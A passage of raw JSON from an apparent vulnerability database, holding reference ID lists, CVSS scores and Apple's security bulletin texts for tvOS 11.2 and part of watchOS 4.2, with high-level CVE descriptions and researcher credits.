"EULEROS_SA-2017-1242.NASL", "EULEROS_SA-2018-1001.NASL", "EULEROS_SA-2018-1002.NASL", "FEDORA_2017-06B373D942.NASL", "FEDORA_2017-0AD0E2F390.NASL", "FEDORA_2017-F45E844A85.NASL", "FEDORA_2018-3199135A7E.NASL", "FEDORA_2018-43712163DE.NASL", "FORTIOS_FG-IR-17-196.NASL", "FREEBSD_PKG_D670A953B2A111E7A633009C02A2AB30.NASL", "GENTOO_GLSA-201711-03.NASL", "GENTOO_GLSA-201801-09.NASL", "INTEL_SA_00101_WLAN.NASL", "ITUNES_12_7_2.NASL", "JUNIPER_JSA10827_KRACK.NASL", "MACOSX_SAFARI11_0_2.NASL", "MACOSX_SECUPD2017-005.NASL", "MACOSX_SECUPD2018-001.NASL", "MACOS_10_13_2.NASL", "NEWSTART_CGSL_NS-SA-2019-0143_KERNEL.NASL", "NVIDIA_UNIX_CVE_2017_5753.NASL", "NVIDIA_WIN_CVE_2017_5753.NASL", "OPENSUSE-2017-1317.NASL", "OPENSUSE-2018-118.NASL", "OPENSUSE-2018-169.NASL", "OPENSUSE-2018-2.NASL", "OPENSUSE-2018-3.NASL", "OPENSUSE-2018-454.NASL", "OPENSUSE-2019-418.NASL", "ORACLELINUX_ELSA-2018-0007.NASL", "ORACLELINUX_ELSA-2018-0008.NASL", "ORACLELINUX_ELSA-2018-1319.NASL", "ORACLELINUX_ELSA-2018-4006.NASL", "ORACLELINUX_ELSA-2018-4011.NASL", "ORACLELINUX_ELSA-2018-4025.NASL", "ORACLELINUX_ELSA-2018-4071.NASL", "ORACLEVM_OVMSA-2018-0005.NASL", "ORACLEVM_OVMSA-2018-0006.NASL", "ORACLEVM_OVMSA-2018-0008.NASL", "ORACLEVM_OVMSA-2018-0010.NASL", "ORACLEVM_OVMSA-2018-0015.NASL", "ORACLEVM_OVMSA-2018-0017.NASL", "ORACLEVM_OVMSA-2018-0020.NASL", "ORACLEVM_OVMSA-2018-0021.NASL", "ORACLEVM_OVMSA-2018-0035.NASL", "REDHAT-RHSA-2018-0007.NASL", "REDHAT-RHSA-2018-0008.NASL", "REDHAT-RHSA-2018-0009.NASL", "REDHAT-RHSA-2018-0010.NASL", "REDHAT-RHSA-2018-0011.NASL", "REDHAT-RHSA-2018-0016.NASL", "REDHAT-RHSA-2018-0017.NASL", "REDHAT-RHSA-2018-0018.NASL", "REDHAT-RHSA-2018-0020.NASL", "REDHAT-RHSA-2018-0021.NASL", "REDHAT-RHSA-2018-0022.NASL", "REDHAT-RHSA-2018-0044.NASL", "REDHAT-RHSA-2018-0045.NASL", "REDHAT-RHSA-2018-0046.NASL", "REDHAT-RHSA-2018-0047.NASL", "REDHAT-RHSA-2018-0182.NASL", "REDHAT-RHSA-2018-0292.NASL", "REDHAT-RHSA-2018-1129.NASL", "REDHAT-RHSA-2018-1319.NASL", "REDHAT-RHSA-2018-1346.NASL", "SCREENOS_JSA10827_KRACK.NASL", "SLACKWARE_SSA_2018-016-01.NASL", "SL_20180103_KERNEL_ON_SL6_X.NASL", "SL_20180103_KERNEL_ON_SL7_X.NASL", "SL_20180508_KERNEL_ON_SL6_X.NASL", "SMB_NT_MS17_OCT_WIN2008.NASL", "SUSE_SU-2017-3103-1.NASL", "SUSE_SU-2017-3117-1.NASL", "SUSE_SU-2017-3118-1.NASL", "SUSE_SU-2017-3119-1.NASL", "SUSE_SU-2017-3123-1.NASL", "SUSE_SU-2017-3124-1.NASL", "SUSE_SU-2017-3125-1.NASL", "SUSE_SU-2017-3127-1.NASL", "SUSE_SU-2017-3130-1.NASL", "SUSE_SU-2017-3131-1.NASL", "SUSE_SU-2017-3132-1.NASL", "SUSE_SU-2017-3145-1.NASL", "SUSE_SU-2017-3146-1.NASL", "SUSE_SU-2017-3147-1.NASL", "SUSE_SU-2017-3148-1.NASL", "SUSE_SU-2017-3149-1.NASL", "SUSE_SU-2017-3150-1.NASL", "SUSE_SU-2017-3151-1.NASL", "SUSE_SU-2017-3152-1.NASL", "SUSE_SU-2017-3153-1.NASL", "SUSE_SU-2017-3154-1.NASL", "SUSE_SU-2017-3157-1.NASL", "SUSE_SU-2017-3158-1.NASL", "SUSE_SU-2017-3160-1.NASL", "SUSE_SU-2017-3265-1.NASL", "SUSE_SU-2018-0010-1.NASL", "SUSE_SU-2018-0011-1.NASL", "SUSE_SU-2018-0012-1.NASL", "SUSE_SU-2018-0031-1.NASL", "SUSE_SU-2018-0040-1.NASL", "SUSE_SU-2018-0069-1.NASL", "SUSE_SU-2018-0113-1.NASL", "SUSE_SU-2018-0114-1.NASL", "SUSE_SU-2018-0115-1.NASL", "SUSE_SU-2018-0131-1.NASL", "SUSE_SU-2018-0171-1.NASL", "SUSE_SU-2018-0219-1.NASL", "SUSE_SU-2018-0438-1.NASL", "SUSE_SU-2018-0472-1.NASL", "SUSE_SU-2018-0555-1.NASL", "SUSE_SU-2018-0601-1.NASL", "SUSE_SU-2018-0609-1.NASL", "SUSE_SU-2018-0638-1.NASL", "SUSE_SU-2018-1177-1.NASL", "SUSE_SU-2018-1181-1.NASL", "SUSE_SU-2018-1184-1.NASL", "SUSE_SU-2018-1202-1.NASL", "SUSE_SU-2018-1203-1.NASL", "SUSE_SU-2018-1216-1.NASL", "UBNT_UNIFI_KRACK.NASL", "UBUNTU_USN-3505-1.NASL", "UBUNTU_USN-3514-1.NASL", "UBUNTU_USN-3516-1.NASL", "UBUNTU_USN-3522-1.NASL", "UBUNTU_USN-3522-2.NASL", "UBUNTU_USN-3522-3.NASL", "UBUNTU_USN-3522-4.NASL", "UBUNTU_USN-3523-1.NASL", "UBUNTU_USN-3523-2.NASL", "UBUNTU_USN-3524-1.NASL", "UBUNTU_USN-3540-1.NASL", "UBUNTU_USN-3540-2.NASL", "UBUNTU_USN-3541-1.NASL", "UBUNTU_USN-3541-2.NASL", "UBUNTU_USN-3551-1.NASL", "UBUNTU_USN-3583-1.NASL", "VIRTUOZZO_VZA-2018-002.NASL", "VIRTUOZZO_VZA-2018-003.NASL", "VIRTUOZZO_VZA-2018-006.NASL", "VIRTUOZZO_VZA-2018-029.NASL", "VIRTUOZZO_VZLSA-2017-2907.NASL", "VMWARE_VCENTER_VMSA-2018-0007.NASL", "XEN_SERVER_XSA-254.NASL"]}, {"type": "nvidia", "idList": ["NVIDIA:4601", "NVIDIA:4610", "NVIDIA:4611", "NVIDIA:4613", "NVIDIA:4614", "NVIDIA:4616", "NVIDIA:4617"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310140432", "OPENVAS:1361412562310703999", "OPENVAS:1361412562310704078", "OPENVAS:1361412562310704082", "OPENVAS:1361412562310704120", "OPENVAS:1361412562310811865", "OPENVAS:1361412562310811921", "OPENVAS:1361412562310811925", "OPENVAS:1361412562310811927", "OPENVAS:1361412562310811959", "OPENVAS:1361412562310812016", "OPENVAS:1361412562310812022", "OPENVAS:1361412562310812026", "OPENVAS:1361412562310812258", "OPENVAS:1361412562310812284", "OPENVAS:1361412562310812285", "OPENVAS:1361412562310812289", "OPENVAS:1361412562310812290", "OPENVAS:1361412562310812291", "OPENVAS:1361412562310812292", "OPENVAS:1361412562310812293", "OPENVAS:1361412562310812294", "OPENVAS:1361412562310812295", "OPENVAS:1361412562310812296", "OPENVAS:1361412562310812384", "OPENVAS:1361412562310812386", "OPENVAS:1361412562310812397", "OPENVAS:1361412562310812398", "OPENVAS:1361412562310812400", "OPENVAS:1361412562310812401", "OPENVAS:1361412562310812408", "OPENVAS:1361412562310812662", "OPENVAS:1361412562310812740", "OPENVAS:1361412562310843392", "OPENVAS:1361412562310843405", "OPENVAS:1361412562310843406", "OPENVAS:1361412562310843409", "OPENVAS:1361412562310843410", "OPENVAS:1361412562310843412", "OPENVAS:1361412562310843413", "OPENVAS:1361412562310843414", "OPENVAS:1361412562310843415", "OPENVAS:1361412562310843418", "OPENVAS:1361412562310843423", "OPENVAS:1361412562310843424", "OPENVAS:1361412562310843427", "OPENVAS:1361412562310843429", "OPENVAS:1361412562310843437", "OPENVAS:1361412562310843461", "OPENVAS:1361412562310851654", "OPENVAS:1361412562310851677", "OPENVAS:1361412562310851678", "OPENVAS:1361412562310851693", "OPENVAS:1361412562310851704", "OPENVAS:1361412562310851742", "OPENVAS:1361412562310873647", "OPENVAS:1361412562310873667", "OPENVAS:1361412562310873699", "OPENVAS:1361412562310873957", "OPENVAS:1361412562310873984", "OPENVAS:1361412562310874059", "OPENVAS:1361412562310874088", "OPENVAS:1361412562310882822", "OPENVAS:1361412562310891150", "OPENVAS:1361412562310891232"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2018-3678067"]}, {"type": "oraclelinux", "idList": ["ELSA-2017-2907", "ELSA-2018-0007", "ELSA-2018-0008", "ELSA-2018-0169", "ELSA-2018-0292", "ELSA-2018-1319", "ELSA-2018-4006", "ELSA-2018-4011", "ELSA-2018-4012", "ELSA-2018-4021", "ELSA-2018-4025", "ELSA-2018-4071"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:145363", "PACKETSTORM:145364", "PACKETSTORM:145876", "PACKETSTORM:153148"]}, {"type": "paloalto", "idList": ["PAN-SA-2018-0001"]}, {"type": "photon", "idList": ["PHSA-2018-0010", "PHSA-2018-1.0-0097"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:02EAB5AF6104A4960F7E3B105CD50FA1", "QUALYSBLOG:3ACE52E54FF5FE3EF1B0FC328181FA66", "QUALYSBLOG:832B33D45F45271E91CA6542BC9CFD59", "QUALYSBLOG:97274435F9F49556ED060635FD9081E2", "QUALYSBLOG:BD020D07BF02B0790C62701D997BFD4D", "QUALYSBLOG:C9F2432F760D960CF69CDC55D87263A8", "QUALYSBLOG:D893D4DFB7141FDAD0BE869440074392", "QUALYSBLOG:E761CF659F35F9F5C29FB50D76B98C3E", "QUALYSBLOG:F7C32BA5E6651A8CE3584BB84A88A0C0", "QUALYSBLOG:F8AA5B21D90BCDD30391A24D6FD47892"]}, {"type": "redhat", "idList": ["RHSA-2017:2911"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-5754", "RH:CVE-2018-19965"]}, {"type": "securelist", "idList": ["SECURELIST:7CF4DDEB1B5407DAA24EC25BAA7A9654"]}, {"type": "seebug", "idList": ["SSV:96986", "SSV:96989", "SSV:96990", "SSV:96991", "SSV:97059", "SSV:97093"]}, {"type": "slackware", "idList": ["SSA-2017-291-02", "SSA-2018-016-01"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2017:2755-1", "OPENSUSE-SU-2017:3144-1", "OPENSUSE-SU-2018:0022-1", "OPENSUSE-SU-2018:0023-1", "OPENSUSE-SU-2018:0326-1", "OPENSUSE-SU-2018:0459-1", "OPENSUSE-SU-2018:1274-1", "SUSE-SU-2017:2745-1", "SUSE-SU-2017:2752-1", "SUSE-SU-2017:3103-1", "SUSE-SU-2017:3106-1", "SUSE-SU-2017:3116-1", "SUSE-SU-2017:3117-1", "SUSE-SU-2017:3118-1", "SUSE-SU-2017:3119-1", "SUSE-SU-2017:3120-1", "SUSE-SU-2017:3121-1", "SUSE-SU-2017:3122-1", "SUSE-SU-2017:3123-1", "SUSE-SU-2017:3124-1", "SUSE-SU-2017:3125-1", "SUSE-SU-2017:3126-1", "SUSE-SU-2017:3127-1", "SUSE-SU-2017:3128-1", "SUSE-SU-2017:3129-1", "SUSE-SU-2017:3130-1", "SUSE-SU-2017:3131-1", "SUSE-SU-2017:3132-1", "SUSE-SU-2017:3134-1", "SUSE-SU-2017:3136-1", "SUSE-SU-2017:3139-1", "SUSE-SU-2017:3145-1", "SUSE-SU-2017:3146-1", "SUSE-SU-2017:3147-1", "SUSE-SU-2017:3148-1", "SUSE-SU-2017:3149-1", "SUSE-SU-2017:3150-1", "SUSE-SU-2017:3151-1", "SUSE-SU-2017:3152-1", "SUSE-SU-2017:3153-1", "SUSE-SU-2017:3154-1", "SUSE-SU-2017:3156-1", "SUSE-SU-2017:3157-1", "SUSE-SU-2017:3158-1", "SUSE-SU-2017:3159-1", "SUSE-SU-2017:3160-1", "SUSE-SU-2017:3165-1", "SUSE-SU-2017:3265-1", "SUSE-SU-2017:3267-1", "SUSE-SU-2018:0010-1", "SUSE-SU-2018:0011-1", "SUSE-SU-2018:0012-1", "SUSE-SU-2018:0031-1", "SUSE-SU-2018:0040-1", "SUSE-SU-2018:0069-1", "SUSE-SU-2018:0113-1", "SUSE-SU-2018:0114-1", "SUSE-SU-2018:0115-1", "SUSE-SU-2018:0131-1", "SUSE-SU-2018:0171-1", "SUSE-SU-2018:0180-1", "SUSE-SU-2018:0213-1", "SUSE-SU-2018:0219-1", "SUSE-SU-2018:0438-1", "SUSE-SU-2018:0472-1", "SUSE-SU-2018:0555-1", "SUSE-SU-2018:0601-1", "SUSE-SU-2018:0609-1", "SUSE-SU-2018:0638-1", "SUSE-SU-2018:1177-1", "SUSE-SU-2018:1181-1", "SUSE-SU-2018:1184-1", "SUSE-SU-2018:1202-1", "SUSE-SU-2018:1203-1", "SUSE-SU-2018:1216-1"]}, {"type": "symantec", "idList": ["SMNTC-1426"]}, {"type": "talosblog", "idList": ["TALOSBLOG:6AF8BBB020A686E442B50095CA9B7A36"]}, {"type": "taosecurity", "idList": ["TAOSECURITY:37F5AF86E0886FC0FBDCCE15A1236586"]}, {"type": "thn", "idList": ["THN:29EC2E0BD61CF15B2E756ECA04EDFF50", "THN:58CFE19533148E77597FE0AC59963145", "THN:788E9312DDA39D9A09855DF379A0FD4D", "THN:96CCD36932DBF3F5BEFCC18D4EC4E5C2"]}, {"type": "threatpost", "idList": ["THREATPOST:0F9EDE9A622A021B9B79C50214D7E8AD", "THREATPOST:590758261828FF8DBC9F74588FAD3DE5", "THREATPOST:6C364316788D445329E5596C5108A157", "THREATPOST:7458AE86ECA810D873D5D35916A93D9F", "THREATPOST:CE89F855271AB3AE3CE8B5B0C141CDC2", "THREATPOST:DB0542CFA474B0D9C91032709EDE296D", "THREATPOST:E454192F36C2E44BAE14AB9B62BE28DB"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:6A0454A8A4891A1004496709868EC034"]}, {"type": "ubuntu", "idList": ["USN-3505-1", "USN-3514-1", "USN-3516-1", "USN-3522-1", "USN-3522-4", "USN-3523-2", "USN-3524-1", "USN-3524-2", "USN-3541-2", "USN-3551-1", "USN-3597-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-7153", "UB:CVE-2017-7160"]}, {"type": "virtuozzo", "idList": ["VZA-2018-001", "VZA-2018-002", "VZA-2018-003", "VZA-2018-006", "VZA-2018-028", "VZA-2018-029"]}, {"type": "vmware", "idList": ["VMSA-2018-0007.6"]}, {"type": "xen", "idList": ["XSA-254"]}, {"type": "zdi", "idList": ["ZDI-18-146", "ZDI-18-147", "ZDI-18-148", "ZDI-18-149", "ZDI-18-150", "ZDI-18-151", "ZDI-18-152", "ZDI-18-153", "ZDI-18-154", "ZDI-18-155", "ZDI-18-156"]}, {"type": "zdt", "idList": ["1337DAY-ID-29198", "1337DAY-ID-29200", "1337DAY-ID-29202", "1337DAY-ID-29935", "1337DAY-ID-32828"]}]}, "exploitation": null, "affected_software": {"major_version": [{"name": "tvos", "version": 11}]}, "vulnersScore": 0.7}, "affectedSoftware": [{"name": "tvos", "operator": "lt", "version": "11.2"}], "scheme": null, "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "_state": {"dependencies": 1659994789, "score": 1659984068, "affected_software_major_version": 1666695388}, "_internal": {"score_hash": "a43e2709674cd9f47038dafdcc4f1804"}}

{"apple": [{"lastseen": "2021-11-10T17:00:39", "description": "# About the security content of tvOS 11.2\n\nThis document describes the security content of tvOS 11.2.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## tvOS 11.2\n\nReleased December 4, 2017\n\n**App Store**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An attacker in a privileged network position may be able to spoof password prompts in App Store\n\nDescription: An input validation issue was addressed through improved input validation.\n\nCVE-2017-7164: Jerry Decime\n\nEntry added January 11, 2018\n\n**Auto Unlock**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-13905: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**CFNetwork Session**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7172: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreAnimation**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7171: 360 Security working with Trend Micro's Zero Day Initiative, and Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreFoundation**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-7151: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**IOKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7162: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added December 21, 2017, updated January 10, 2018\n\n**IOSurface**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13861: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13904: Kevin Backhouse of Semmle Ltd.\n\nEntry added February 14, 2018\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to read kernel memory (Meltdown)\n\nDescription: Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache.\n\nCVE-2017-5754: Jann Horn of Google Project Zero; Moritz Lipp of Graz University of Technology; Michael Schwarz of Graz University of Technology; Daniel Gruss of Graz University of Technology; Thomas Prescher of Cyberus Technology GmbH; Werner Haas of Cyberus Technology GmbH; Stefan Mangard of Graz University of Technology; Paul Kocher; Daniel Genkin of University of Pennsylvania and University of Maryland; Yuval Yarom of University of Adelaide and Data61; and Mike Hamburg of Rambus (Cryptography Research Division)\n\nEntry added January 4, 2018, updated January 10, 2018\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13862: Apple\n\nCVE-2017-13867: Ian Beer of Google Project Zero\n\nCVE-2017-13876: Ian Beer of Google Project Zero\n\nEntry updated December 21, 2017\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2017-7173: Brandon Azad\n\nEntry updated August 1, 2018\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to read restricted memory\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2017-13855: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to read restricted memory\n\nDescription: Multiple validation issues were addressed with improved input sanitization.\n\nCVE-2017-13865: Ian Beer of Google Project Zero\n\nCVE-2017-13868: Brandon Azad\n\nCVE-2017-13869: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An input validation issue existed in the kernel. This issue was addressed through improved input validation.\n\nCVE-2017-7154: Jann Horn of Google Project Zero\n\nEntry added December 21, 2017\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13885: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7165: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13884: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Visiting a malicious website may lead to user interface spoofing\n\nDescription: Redirect responses to 401 Unauthorized may allow a malicious website to incorrectly display the lock icon on mixed content. This issue was addressed through improved URL display logic.\n\nCVE-2017-7153: Jerry Decime\n\nEntry added January 11, 2018\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7156: Yuan Deng of Ant-financial Light-Year Security Lab\n\nCVE-2017-7157: an anonymous researcher\n\nCVE-2017-13856: Jeonghoon Shin\n\nCVE-2017-13870: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-7160: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-13866: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry updated January 10, 2018\n\n**Wi-Fi**\n\nAvailable for: Apple TV (4th generation) \nReleased for Apple TV 4K in [tvOS 11.1](<https://support.apple.com/kb/HT208219>).\n\nImpact: An attacker in Wi-Fi range may force nonce reuse in WPA multicast/GTK clients (Key Reinstallation Attacks - KRACK)\n\nDescription: A logic issue existed in the handling of state transitions. This was addressed with improved state management.\n\nCVE-2017-13080: Mathy Vanhoef of the imec-DistriNet group at KU Leuven\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: October 18, 2018\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-04T00:00:00", "type": "apple", "title": "About the security content of tvOS 11.2", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13080", "CVE-2017-13855", "CVE-2017-13856", "CVE-2017-13861", "CVE-2017-13862", "CVE-2017-13865", "CVE-2017-13866", "CVE-2017-13867", "CVE-2017-13868", "CVE-2017-13869", "CVE-2017-13870", "CVE-2017-13876", "CVE-2017-13884", "CVE-2017-13885", "CVE-2017-13904", "CVE-2017-13905", "CVE-2017-5754", "CVE-2017-7151", "CVE-2017-7153", "CVE-2017-7154", "CVE-2017-7156", "CVE-2017-7157", "CVE-2017-7160", "CVE-2017-7162", "CVE-2017-7164", "CVE-2017-7165", "CVE-2017-7171", "CVE-2017-7172", "CVE-2017-7173"], "modified": "2017-12-04T00:00:00", "id": "APPLE:F6306C158D7B30BA0A0EDD411C414BFE", "href": "https://support.apple.com/kb/HT208327", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-10T17:00:38", "description": "# About the security content of watchOS 4.2\n\nThis document describes the security content of watchOS 4.2.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## watchOS 4.2\n\nReleased December 5, 2017\n\n**Auto Unlock**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-13905: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**CFNetwork Session**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7172: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreAnimation**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7171: 360 Security working with Trend Micro's Zero Day Initiative, and Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreFoundation**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-7151: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**IOKit**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7162: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added December 21, 2017, updated January 10, 2018\n\n**IOSurface**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13861: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13904: Kevin Backhouse of Semmle Ltd.\n\nEntry added February 14, 2018\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An input validation issue existed in the kernel. This issue was addressed through improved input validation.\n\nCVE-2017-7154: Jann Horn of Google Project Zero\n\nEntry added January 10, 2018\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13862: Apple\n\nCVE-2017-13867: Ian Beer of Google Project 